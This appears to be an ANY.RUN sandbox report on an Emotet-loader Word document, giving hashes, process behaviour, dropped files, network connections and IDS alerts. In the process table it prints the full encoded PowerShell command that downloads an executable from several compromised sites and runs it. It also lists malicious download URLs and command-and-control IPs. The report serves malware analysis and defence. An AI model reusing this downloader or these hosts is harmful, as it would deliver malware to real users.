analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ACC_E85297.doc

Full analysis: https://app.any.run/tasks/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 25, 2019, 10:37:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Mar 22 14:15:00 2019, Last Saved Time/Date: Fri Mar 22 14:15:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
MD5:

3DD60690ECC0F589BB58E44866640596

SHA1:

3906379891EA7659C15192C2CF062E239B1B3AF0

SHA256:

68BC255F9B0DB6A0D30A8F2DADFBEE3256ACFE12497BF93943BC1EAB0735E45E

SSDEEP:

3072:z77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qlR93YtsJAY687:z77HUUUUUUUUUUUUUUUUUUUT52Vr2x7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 859.exe (PID: 3124)
      • 859.exe (PID: 2168)
      • wabmetagen.exe (PID: 1584)
      • wabmetagen.exe (PID: 3156)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1956)
    • Emotet process was detected

      • wabmetagen.exe (PID: 1584)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 859.exe (PID: 3124)
      • powershell.exe (PID: 1956)
    • Creates files in the user directory

      • powershell.exe (PID: 1956)
    • Application launched itself

      • 859.exe (PID: 2168)
      • wabmetagen.exe (PID: 1584)
    • Starts itself from another location

      • 859.exe (PID: 3124)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3864)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3864)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 7
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 7
Words: 1
Pages: 1
ModifyDate: 2019:03:22 14:15:00
CreateDate: 2019:03:22 14:15:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 859.exe no specs 859.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3864"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ACC_E85297.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1956powershell -e JABrAEEAeAB3AFUAdwBBAGsAPQAoACcAaQAnACsAJwBrACcAKwAnAG8AUQBBAEEAbwBaACcAKQA7ACQAbABBAEEAUQBDAG8ARAA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATwBBAEQAdwBBADEARAA9ACgAJwBoACcAKwAnAHQAdABwADoALwAvAGEAcgB0AG0AaQBrACcAKwAnAGgAYQBsAGMAaAB5AGsALgBjAG8AbQAvAHcAcAAtAGkAbgAnACsAJwBjACcAKwAnAGwAdQBkAGUAcwAnACsAJwAvACcAKwAnAG0AWQBXADMALwBAAGgAJwArACcAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8AZgByAGEAbgBvAHMAYgBhACcAKwAnAHIAYgBlAHIAcwBoACcAKwAnAG8AcAAuAGMAbwBtAC8AdwAnACsAJwBwAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAvACcAKwAnAHAAbAB1AGcAaQBuAHMALwBJAFUAaAAxAC8AJwArACcAQABoAHQAJwArACcAdABwADoALwAvAGEAcgBlACcAKwAnAHgAYwBhAHIAZwBvAC4AJwArACcAYwBvAG0ALwAnACsAJwB3AHAALQBpAG4AYwBsAHUAZABlAHMAJwArACcALwAnACsAJwBRACcAKwAnAEIAYwBpACcAKwAnAC8AQAAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvAGEAJwArACcAbAB0AGEAJwArACcAcgBmAHgAJwArACcALgBjACcAKwAnAG8AbQAvACcAKwAnAHcAJwArACcAbwByAGQAcAByAGUAcwBzAC8AJwArACcAdwAnACsAJwBRAFkAdAAvAEAAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwB1AGkAJwArACcAdABjAHMALgBhAGMAbQAnACsAJwAuACcAKwAnAG8AcgBnAC8AJwArACcAdwAnACsAJwBwAC0AYwBvAG4AdABlAG4AJwArACcAdAAvACcAKwAnAGYAcQBTAGwAdAAnACsAJwAvACcAKQAuACgAJwBTACcAKwAnAHAAbABpAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnAEAAJwApADsAJABNAEEAbwBRAEIAQgA9ACgAJwBQACcAKwAnADQAQQBrAFgAJwArACcAWABVAFgAJwApADsAJABtAG8ARwAxAFUAQQBBACAAPQAgACgAJwA4ACcAKwAnADUAOQAnACkAOwAkAGEARABBAEEAUQBCAEQAQgA9ACgAJwBNAEEAMQBEAEQAJwArACcANABvACcAKQA7ACQAaQBBAFEAQQBRAFoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAG0AbwBHADEAVQBBAEEAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABQAEEAQQA0AEEAawBaACAAaQBuACAAJABPAEEARAB3AEEAMQBEACkAewB0AHIAeQB7ACQAbABBAEEAUQBDAG8ARAAuACgAJwBEACcAKwAnAG8AdwBuACcAKwAnAGwAbwBhAGQARgBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAUABBAEEANABBAGsAWgAsACAAJABpAEEAUQBBAFEAWgApADsAJABoAEEAQQBBAEEAQgA9ACgAJwB3ACcAKwAnAFUAawAnACsAJwBEAFgARABBACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABpAEEAUQBBAFEAWgApAC4AIgBMAGAARQBuAGAAZwBUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AC4AKAAnAEkAbgB2AG8AawAnACsAJwBlAC0AJwArACcASQB0AGUAbQAnACkAIAAkAGkAQQBRAEEAUQBaADsAJABRAFoAawBBAHcAQQBCAFUAPQAoACcAegAnACsAJwBBAEIANABRAEEANABrACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABYAGsAQQAxAEQAQQBBAD0AKAAnAEMAJwArACcAQQBBAEEARABBACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2168"C:\Users\admin\859.exe" C:\Users\admin\859.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3124--2ceea0faC:\Users\admin\859.exe
859.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1584"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
859.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3156--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 720
Read events
1 239
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3864WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2817.tmp.cvr
MD5:
SHA256:
1956powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WP6FHSBX8IW9R4F47SLF.temp
MD5:
SHA256:
1956powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3864WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E0A6D871DF9AF8A843020CC2FC70CA4E
SHA256:33FAFDD37700ECE853AC83901FBEAB68A9A8E725B6B27DF6C65EDBF64767BE47
3864WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C_E85297.docpgc
MD5:67EE4BF5411344CCCBBEBEAB5C6BF352
SHA256:1E720E0F9FCC4268F87EEA789200291F7AC108F15EB5A0D06C2C76809877245B
3864WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:405940EA9B999415C5937A0109A1B190
SHA256:D60542A3E13CFDAA51C74FC2E4774AD18F72934E77DBDB253088B63547DDF06C
1956powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF113248.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1956powershell.exeC:\Users\admin\859.exeexecutable
MD5:F0ED1503CBEFFC2BE81DC95FC0E55A70
SHA256:6DB17F8F177A08D8750A9A96A488824D9D72E87919CC71011A44F72E8B785323
3124859.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:F0ED1503CBEFFC2BE81DC95FC0E55A70
SHA256:6DB17F8F177A08D8750A9A96A488824D9D72E87919CC71011A44F72E8B785323
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
9
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1956
powershell.exe
GET
404
89.184.94.112:80
http://artmikhalchyk.com/wp-includes/mYW3/
UA
html
215 b
suspicious
1956
powershell.exe
GET
200
162.254.252.104:80
http://uitcs.acm.org/wp-content/fqSlt/
US
executable
202 Kb
suspicious
1956
powershell.exe
GET
403
171.22.26.34:80
http://arexcargo.com/wp-includes/QBci/
GB
html
1.11 Kb
suspicious
1956
powershell.exe
GET
403
64.41.83.139:80
http://altarfx.com/wordpress/wQYt/
US
html
1020 b
malicious
3156
wabmetagen.exe
POST
115.75.36.220:443
http://115.75.36.220:443/chunk/merge/ringin/
VN
suspicious
3156
wabmetagen.exe
POST
186.5.100.92:443
http://186.5.100.92:443/health/sym/
EC
suspicious
1956
powershell.exe
GET
301
167.99.187.243:80
http://franosbarbershop.com/wp-content/plugins/IUh1/
US
html
178 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1956
powershell.exe
171.22.26.34:80
arexcargo.com
GB
suspicious
1956
powershell.exe
89.184.94.112:80
artmikhalchyk.com
Internet Invest Ltd.
UA
suspicious
1956
powershell.exe
167.99.187.243:443
franosbarbershop.com
US
suspicious
3156
wabmetagen.exe
115.75.36.220:443
Viettel Corporation
VN
suspicious
1956
powershell.exe
64.41.83.139:80
altarfx.com
Affinity Internet, Inc
US
malicious
1956
powershell.exe
167.99.187.243:80
franosbarbershop.com
US
suspicious
3156
wabmetagen.exe
186.5.100.92:443
Telconet S.A
EC
suspicious
1956
powershell.exe
162.254.252.104:80
uitcs.acm.org
A2 Hosting, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
artmikhalchyk.com
  • 89.184.94.112
suspicious
franosbarbershop.com
  • 167.99.187.243
suspicious
arexcargo.com
  • 171.22.26.34
suspicious
altarfx.com
  • 64.41.83.139
malicious
uitcs.acm.org
  • 162.254.252.104
suspicious

Threats

PID
Process
Class
Message
1956
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1956
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1956
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info